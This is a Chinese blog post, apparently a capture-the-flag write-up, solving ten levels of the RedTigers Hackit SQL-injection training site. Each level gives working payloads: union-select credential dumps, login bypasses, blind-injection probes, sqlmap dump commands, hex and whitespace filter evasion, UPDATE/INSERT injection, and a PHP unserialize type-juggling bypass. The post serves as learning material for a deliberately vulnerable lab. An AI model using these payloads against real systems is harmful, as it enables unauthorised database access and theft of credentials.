<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="sql注入," />





  <link rel="alternate" href="/atom.xml" title="ugly's Notes" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="前言RedTigers Hackit是一个训练SQL注入漏洞和PHP方面的网站，地址为https://redtiger.labs.overthewire.org/，也是看各位做CTF比赛的人分享的一个学习网站，总共有10关，感觉学到不少。">
<meta property="og:type" content="article">
<meta property="og:title" content="RedTigers Hackit通关笔记">
<meta property="og:url" content="http://ug1y.github.io/2016/10/04/RedTigers-Hackit通关笔记/index.html">
<meta property="og:site_name" content="ugly's Notes">
<meta property="og:description" content="前言RedTigers Hackit是一个训练SQL注入漏洞和PHP方面的网站，地址为https://redtiger.labs.overthewire.org/，也是看各位做CTF比赛的人分享的一个学习网站，总共有10关，感觉学到不少。">
<meta property="og:image" content="http://ug1y.github.io/images/red_20161004172950.png">
<meta property="og:image" content="http://ug1y.github.io/images/red_20161004190358.png">
<meta property="og:updated_time" content="2016-10-05T13:00:48.830Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="RedTigers Hackit通关笔记">
<meta name="twitter:description" content="前言RedTigers Hackit是一个训练SQL注入漏洞和PHP方面的网站，地址为https://redtiger.labs.overthewire.org/，也是看各位做CTF比赛的人分享的一个学习网站，总共有10关，感觉学到不少。">
<meta name="twitter:image" content="http://ug1y.github.io/images/red_20161004172950.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 6321632063174739000,
      author: '丑爷'
    }
  };
</script>




  <link rel="canonical" href="http://ug1y.github.io/2016/10/04/RedTigers-Hackit通关笔记/"/>

  <title> RedTigers Hackit通关笔记 | ugly's Notes </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?217893164df03158455abf1decb7fbd0";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">ugly's Notes</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>


    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                RedTigers Hackit通关笔记
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-10-04T17:20:59+08:00" content="2016-10-04">
              2016-10-04
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/CTF-Writeups/" itemprop="url" rel="index">
                    <span itemprop="name">CTF Writeups</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/10/04/RedTigers-Hackit通关笔记/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/10/04/RedTigers-Hackit通关笔记/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>RedTigers Hackit是一个训练SQL注入漏洞和PHP方面的网站，地址为<a href="https://redtiger.labs.overthewire.org/" target="_blank" rel="external">https://redtiger.labs.overthewire.org/</a>，也是看各位做CTF比赛的人分享的一个学习网站，总共有10关，感觉学到不少。</p>
<p><img src="/images/red_20161004172950.png" alt=""></p>
<a id="more"></a> 
<h1 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h1><p>既然是简单的sql注入，那我们就按照正常流程去试试，试验知道cat参数是纯粹的数字输入，没有用引号包裹，构造<code>?cat=1 or 1</code>，能够正常输出。猜测select语句的列数<code>?cat=1 order by 4</code>得到输出4列，用联合查询得到产生输出的位置，最后构造查询语句从level1_users数据库中得到结果。注入语句构造如下：<br><strong><code>https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users</code></strong></p>
<p>ps：这里直接from数据库就可以，发现可以用<code>where 1</code>获得结果，然而<code>where username=&quot;Hornoxe&quot;</code>无法正确输出，猜测可能对引号禁用。</p>
<h1 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h1><p>简单的登录绕过，立马想到应该是用万能密码，那么就找以下注入点，用户名和密码提示都不能为空，用户名和密码分别给一个<code>&#39;</code>符号，password参数报错，即为注入点，使用条件注入，<code>#</code>注释后面的语句构造如下：<br>Post data：<strong><code>username=a&amp;password=p&#39; or 1#&amp;login=Login</code></strong></p>
<h1 id="Level-3"><a href="#Level-3" class="headerlink" title="Level 3"></a>Level 3</h1><p>获取Admin用户的密码，提示我们产生一个错误，点击<code>TheCow</code>和<code>Admin</code>的链接，其<code>usr</code>参数得到<code>MDYzMjIzMDA2MTU2MTQxMjU0</code>和<code>MDQyMjExMDE0MTgyMTQw</code>，看样子像是编码过的，要让我们对请求参数产生一个错误，直接对参数输入引号等特殊字符应当会使得解码失败而无效，于是想到php传递一个数组过去看能不能产生错误，构造：<br><strong><code>https://redtiger.labs.overthewire.org/level3.php?usr[]=</code></strong></p>
<p>显示出来一个错误：<br><code>Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25</code></p>
<p>根据路径去访问这个文件，可以得到文件的源码：（右击源代码查看）<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line">	<span class="comment">// warning! ugly code ahead :)</span></div><div class="line">  		</div><div class="line">	<span class="function"><span class="keyword">function</span> <span class="title">encrypt</span><span class="params">($str)</span></span></div><div class="line">	&#123;</div><div class="line">		$cryptedstr = <span class="string">""</span>;</div><div class="line">		srand(<span class="number">3284724</span>);</div><div class="line">		<span class="keyword">for</span> ($i =<span class="number">0</span>; $i &lt; strlen($str); $i++)</div><div class="line">		&#123;</div><div class="line">			$temp = ord(substr($str,$i,<span class="number">1</span>)) ^ rand(<span class="number">0</span>, <span class="number">255</span>);</div><div class="line">			</div><div class="line">			<span class="keyword">while</span>(strlen($temp)&lt;<span class="number">3</span>)</div><div class="line">			&#123;</div><div class="line">				$temp = <span class="string">"0"</span>.$temp;</div><div class="line">			&#125;</div><div class="line">			$cryptedstr .= $temp. <span class="string">""</span>;</div><div class="line">		&#125;</div><div class="line">		<span class="keyword">return</span> base64_encode($cryptedstr);</div><div class="line">	&#125;</div><div class="line">  </div><div class="line">	<span class="function"><span class="keyword">function</span> <span class="title">decrypt</span> <span class="params">($str)</span></span></div><div class="line">	&#123;</div><div class="line">		srand(<span class="number">3284724</span>);</div><div class="line">		<span class="keyword">if</span>(preg_match(<span class="string">'%^[a-zA-Z0-9/+]*=&#123;0,2&#125;$%'</span>,$str))</div><div class="line">		&#123;</div><div class="line">			$str = base64_decode($str);</div><div class="line">			<span class="keyword">if</span> ($str != <span class="string">""</span> &amp;&amp; $str != <span class="keyword">null</span> &amp;&amp; $str != <span class="keyword">false</span>)</div><div class="line">			&#123;</div><div class="line">				$decStr = <span class="string">""</span>;</div><div class="line">				</div><div class="line">				<span class="keyword">for</span> ($i=<span class="number">0</span>; $i &lt; strlen($str); $i+=<span class="number">3</span>)</div><div class="line">				&#123;</div><div class="line">					$array[$i/<span class="number">3</span>] = substr($str,$i,<span class="number">3</span>);</div><div class="line">				&#125;</div><div class="line"></div><div class="line">				<span class="keyword">foreach</span>($array <span class="keyword">as</span> $s)</div><div class="line">				&#123;</div><div class="line">					$a = $s ^ rand(<span class="number">0</span>, <span class="number">255</span>);</div><div class="line">					$decStr .= chr($a);</div><div class="line">				&#125;</div><div class="line">				</div><div class="line">				<span class="keyword">return</span> $decStr;</div><div class="line">			&#125;</div><div class="line">			<span class="keyword">return</span> <span class="keyword">false</span>;</div><div class="line">		&#125;</div><div class="line">		<span class="keyword">return</span> <span class="keyword">false</span>;</div><div class="line">	&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>还是一样的方法，先构造注入语句，只是构造好之后编码再输入，几次尝试后，发现可以用<code>#</code>注释，构造<code>&#39; or 1#</code>可以成功注入，编码后<code>MDc2MTUxMDEyMTczMTk0MTg0MjIw</code>，于是下一步获取select语言的列数，构造<code>Admin&#39; order by 7#</code>，编码为<code>MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY2</code>，得知列数为7，最后通过联合查询，获取显示的列位并对应查构造语句如下：<br><strong><code>&#39; union select 1,username,3,4,5,password,7 from level3_users where username=&#39;Admin&#39;#</code></strong><br>编码为<strong><code>MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDIwMjM4MDE1MTI3MTMzMTkwMTU0MDAxMjQ2MTU3MjA4MTc3MDk2MTI4MjIwMTE2MTIxMTYzMTQ5MjEzMTYwMTA4MDMyMjUyMjAzMDk3MTU2MTkwMTc1MDEzMTM5MDc4MTU1MDk2MDg1MTM0MTk3MTE5MDU5MTYzMTc4MDU2MDM3MDAzMTM2MDQ3MDY2MTA2MTE0MDQ2MjA2MTQ4MDcyMTQxMjE0MDc1MDQ0MjE1MjAzMDM3MDgyMTk4MDcyMTIzMjE1MTE0MjIz</code></strong></p>
<h1 id="Level-4"><a href="#Level-4" class="headerlink" title="Level 4"></a>Level 4</h1><p>这一关看样子是盲注了，页面输出<code>Query returned 1 rows.</code>消息来告知注入是否是正确返回查询的。首先判断注入点的注入方式，<code>?id=1 or 1</code>成功返回1行，即注入成功。<code>?id=1 order by 2</code>得到select语句总共输出两列。接下来的就是用<code>length()、substr()、ascii()</code>等函数对数据表的<code>keyword</code>列的内容进行猜测了。如下构造得知列内容长度为21：<br><strong><code>https://redtiger.labs.overthewire.org/level4.php?id=-1 or (select length(keyword) from level4_secret)&gt;20</code></strong></p>
<p>另外，对每一个字符进行猜测可得到所有字符，猜测到第一个字符ascii码为107，即字符<code>k</code>：<br><strong><code>https://redtiger.labs.overthewire.org/level4.php?id=-1 or (select ascii(substr(keyword,1,1)) from level4_secret)&gt;106</code></strong></p>
<p>可以写一个脚本来跑一遍得到最终结果，我比较懒，用sqlmap自动去跑好了，首先检测注入点：<br><strong><code>python sqlmap.py -u &quot;https://redtiger.labs.overthewire.org/level4.php?id=1&quot; --cookie &quot;level4login=there_is_no_bug&quot; --dbms mysql --batch</code></strong><br>接下来获取指定数据库中表的指定列内容，需要耐心等待：<br><strong><code>python sqlmap.py -u &quot;https://redtiger.labs.overthewire.org/level4.php?id=1&quot; --cookie &quot;level4login=there_is_no_bug&quot; --dbms mysql -D hackit -T level4_secret -C keyword --dump</code></strong></p>
<p><img src="/images/red_20161004190358.png" alt=""></p>
<h1 id="Level-5"><a href="#Level-5" class="headerlink" title="Level 5"></a>Level 5</h1><p>题目提示是绕过登录，密码是MD5加密过的。表单username参数输入<code>\</code>输出错误，于是同样找到构造<code>a&#39; or 1#</code>来注入。首先获得select查询的列数<code>a&#39; order by 2#</code>得知列数为2，构造联合查询<code>a&#39; union select 1,2#</code>，其中两列一个是查询的username，另一个是md5加密过的password，查询语句获取相应的用户名和密码，然后查找是否有匹配的项，于是我们可以构造一对有效的组合，用户名为<code>1</code>，密码为<code>2</code>，于是密码的MD5值为<code>c81e728d9d4c2f636f067f89cc14862c</code>。</p>
<p>将密码的MD5值插到查询中，对应的值作为POST参数传递过去，匹配上则登录绕过成功，最终的构造为：<br>Post data：<strong><code>username=a&#39; union select 1,&#39;c81e728d9d4c2f636f067f89cc14862c&#39;#&amp;password=2&amp;login=Login</code></strong></p>
<h1 id="Level-6"><a href="#Level-6" class="headerlink" title="Level 6"></a>Level 6</h1><p>首先检测注入点是否需要引号括号之类闭包，得到<code>?user=1 or 1--+</code>可以注入。获取查询语句的列数<code>?user=1 order by 5--+</code>为5列，构造联合查询发现显示<code>User not found</code>，并没有显示对应的输出行，构造<code>?user=0 union select 1,2,3,4,5 from level6_users where status=1--+</code>也是一样，这里就比较郁闷了。</p>
<p>于是拿<code>username</code>放到<code>1,2,3,4,5</code>上各试了一下，发现<code>username</code>在<code>2</code>上的时候会正常显示。对应构造为<code>?user=0 union select 1,username,3,4,5 from level6_users--+</code>，那么就同样检测注入点<code>?user=0 union select 1,1&#39; or 1#,3,4,5 from level6_users--+</code>，这里出现了错误，在网上找的答案说是过滤，有可能就是过滤了单引号，那么就转成16进制试试<code>?user=0 union select 1,0x3127206f72203123,3,4,5 from level6_users--+</code>，成功显示了。</p>
<p>接下来就按照正常构造获取相应的显示位<code>1&#39; union select 1,2,3,4,5 from level6_users#</code>，转成16进制插入，对应的构造为<code>?user=0 union select 1,0x312720756e696f6e2073656c65637420312c322c332c342c352066726f6d206c6576656c365f757365727323,3,4,5 from level6_users--+</code>，获取到显示位是2和4，查询用户名和密码，注意<code>status</code>状态为1，构造<strong><code>1&#39; union select 1,username,3,password,5 from level6_users where status=1#</code></strong>，转成16进制插入，最终的构造为：<br><strong><code>?user=0 union select 1,0x312720756e696f6e2073656c65637420312c757365726e616d652c332c70617373776f72642c352066726f6d206c6576656c365f7573657273207768657265207374617475733d3123,3,4,5 from level6_users--+</code></strong></p>
<h1 id="Level-7"><a href="#Level-7" class="headerlink" title="Level 7"></a>Level 7</h1><p>要获取新闻相关的作者，首先输入<code>google</code>看看有哪些新闻，就一篇。试着产生错误比如加一个引号，报错得到了查询语句<code>SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE &#39;%google&#39;%&#39; OR text.title LIKE &#39;%google&#39;%&#39;)</code>，尝试检测注入点，<code>#</code>被禁止了不能用，那就试试<code>--</code>，貌似也被禁掉了，实际上空格可以使用如下符号替换其使用：<br><code>%20 %09 %0a %0b %0c %0d %a0 /**/</code></p>
<p>用<code>%a0</code>可以替换空格实现注释，其注入点为<code>search=google%&#39;)--%a0&amp;dosearch=search%21</code>，然后用同样的方法先猜测查询语句输出几列，发现<code>order</code>被禁不能用，那就直接联合查询猜测，发现共有4列。第4列和第3列显示出来了，最终的构造如下：<br>Post data：<strong><code>search=google%&#39;) union select 1,2,text.title,autor from level7_news news,level7_texts text where text.id=news.id--%a0&amp;dosearch=search%21</code></strong></p>
<h1 id="Level-8"><a href="#Level-8" class="headerlink" title="Level 8"></a>Level 8</h1><p>看样子应该是一个<code>update</code>语句，更新表单的操作。还是老办法，先找注入点，添加<code>\、&#39;、&quot;</code>等符号尝试每个请求参数，只有<code>Email</code>报出了错误如下<code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;12345&#39;, age = &#39;25&#39; WHERE id = 1&#39; at line 3</code></p>
<p>根据页面上的错误，猜测是一个update语句，后台的SQL语句的写法应该是：<br><code>update table set name=[name], email=[email] ,icq=[icq], age=[age] where id=1</code><br>即检测得注入点<code>email=&#39; or &#39;&#39;=&#39;&amp;name=Hans&amp;icq=12345&amp;age=25&amp;edit=Edit</code>未报错成功返回印证了猜测。</p>
<p>这里的update语句中，<code>email</code>在<code>name</code>的后面，并且还作为注入点，可以用覆盖的方法来获取其他字段的内容，在大部分的语言中放在后面的字段赋值会覆盖掉原先有的变量值，这里覆盖后再把引号包起来构成完整的sql更新语句，最终构造如下，表单<code>name</code>控件将显示字段<code>password</code>的内容：<br>Post data：<strong><code>email=&#39;,name=password,icq=&#39;&amp;name=Hans&amp;icq=12345&amp;age=25&amp;edit=Edit</code></strong></p>
<h1 id="Level-9"><a href="#Level-9" class="headerlink" title="Level 9"></a>Level 9</h1><p>老办法挨个试一遍，发现表单请求<code>text</code>是注入点，页面报错<code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#39;&#39;\&#39;)&#39; at line 6</code>，这里猜测后台使用<code>insert</code>语句插入然后查询，猜测其写法为：<br><code>insert into table(autor,title,text) values([autor],[title],[text])</code></p>
<p>利用<code>insert</code>语句插入多行结果，同时注意右边引号和括号的闭包，可以构造注入语句<code>autor=&amp;title=&amp;text=0&#39;),(1,2,&#39;3&amp;post=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2</code>看到对应的显示位，其中第1位和第2位可以构造查询语句来获取我们想要的结果，最终构造注入为：<br>Post data：<strong><code>autor=&amp;title=&amp;text=0&#39;),((select username from level9_users limit 0,1),(select password from level9_users limit 0,1),&#39;3&amp;post=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2</code></strong></p>
<h1 id="Level-10"><a href="#Level-10" class="headerlink" title="Level 10"></a>Level 10</h1><p>页面有一个隐藏的表单项<code>login</code>,点击登录后登录提示用户是Monkey，然后请求参数是一段类似乱码一样的东西，<code>login=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&amp;dologin=Login</code>，不过看这些字符应该能猜到是base64编码了，所以果断解码一波得到<code>a:2:{s:8:&quot;username&quot;;s:6:&quot;Monkey&quot;;s:8:&quot;password&quot;;s:12:&quot;0815password&quot;;}</code></p>
<p>这么高端的数据表示方法没见过，后来搜了一下原来是php的序列化操作，函数<a href="http://php.net/manual/zh/function.serialize.php" target="_blank" rel="external">serialize()</a>的输出，将对象序列化成字符串，便于网络传输，有点像json格式的数据，也就是说这种序列化对象的操作可以传递任意支持的数据类型。</p>
<p>由此可以猜测后台的php代码的写法：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">$new = unserialize($_POST[<span class="string">"login"</span>]);</div><div class="line">$username = $new[<span class="string">"username"</span>];</div><div class="line">$password = $new[<span class="string">"password"</span>];</div><div class="line">$sql = <span class="string">"select password from users where username="</span>.$username;</div><div class="line">$result = mysql_query($sql);</div><div class="line"><span class="keyword">if</span>($result) &#123;</div><div class="line">	$row = mysql_fetch_row($result);</div><div class="line">	<span class="keyword">if</span> ($row[<span class="string">"password"</span>]==$password) &#123;</div><div class="line">		<span class="keyword">echo</span> <span class="string">"Welcome "</span>.$username;</div><div class="line">	&#125;</div><div class="line">&#125; <span class="keyword">else</span> &#123;</div><div class="line">	<span class="keyword">echo</span> <span class="string">"login incorrect"</span>;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure></p>
<p>假设是上面这种后台写法，那么就可以用php的若数据类型来绕过，序列化操作能够传递任意类型的数据，数据库中读取的密码是不为空的字符串，在<a href="http://php.net/manual/zh/types.comparisons.php#types.comparisions-loose" target="_blank" rel="external">松散比较</a>中，非空字符串与布尔真值、数字0相等，于是根据序列化的格式构造绕过<code>a:2:{s:8:&quot;username&quot;;s:9:&quot;TheMaster&quot;;s:8:&quot;password&quot;;b:1;}</code>或者<code>a:2:{s:8:&quot;username&quot;;s:9:&quot;TheMaster&quot;;s:8:&quot;password&quot;;i:0;}</code>都可以成功绕过，最终的构造如下：<br>Post data 1：<strong><code>login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&amp;dologin=Login</code></strong><br>Post data 2：<strong><code>login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7aTowO30=&amp;dologin=Login</code></strong></p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>果然高人们推荐的训练平台灰常的棒，前前后后查了不少资料也看了别人的writeup才学会弄明白。在这个平台慢慢掌握并学习到了SQL注入的一点点套路和方法，收获不少，同时也明白这信息安全背后有更多的内容需要学习。很多的知识并不像表面看上去那么复杂，实际上可能只是没有找到门路。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sql注入/" rel="tag">#sql注入</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/10/04/sqlmap使用笔记/" rel="next" title="sqlmap使用笔记">
                <i class="fa fa-chevron-left"></i> sqlmap使用笔记
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  <p>热评文章</p>
  <div class="ds-top-threads" data-range="weekly" data-num-items="4"></div>


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/10/04/RedTigers-Hackit通关笔记/"
           data-title="RedTigers Hackit通关笔记" data-url="http://ug1y.github.io/2016/10/04/RedTigers-Hackit通关笔记/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.jpg"
               alt="ug1y" />
          <p class="site-author-name" itemprop="name">ug1y</p>
          <p class="site-description motion-element" itemprop="description">活到老，学到老，一直老到死不了。</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">11</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/ug1y" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/5279687010" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.baidu.com/" title="baidu" target="_blank">baidu</a>
                </li>
              
            </ul>
          </div>
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-1"><span class="nav-number">2.</span> <span class="nav-text">Level 1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-2"><span class="nav-number">3.</span> <span class="nav-text">Level 2</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-3"><span class="nav-number">4.</span> <span class="nav-text">Level 3</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-4"><span class="nav-number">5.</span> <span class="nav-text">Level 4</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-5"><span class="nav-number">6.</span> <span class="nav-text">Level 5</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-6"><span class="nav-number">7.</span> <span class="nav-text">Level 6</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-7"><span class="nav-number">8.</span> <span class="nav-text">Level 7</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-8"><span class="nav-number">9.</span> <span class="nav-text">Level 8</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-9"><span class="nav-number">10.</span> <span class="nav-text">Level 9</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Level-10"><span class="nav-number">11.</span> <span class="nav-text">Level 10</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#总结"><span class="nav-number">12.</span> <span class="nav-text">总结</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ug1y</span>
</div>

<div class="powered-by">
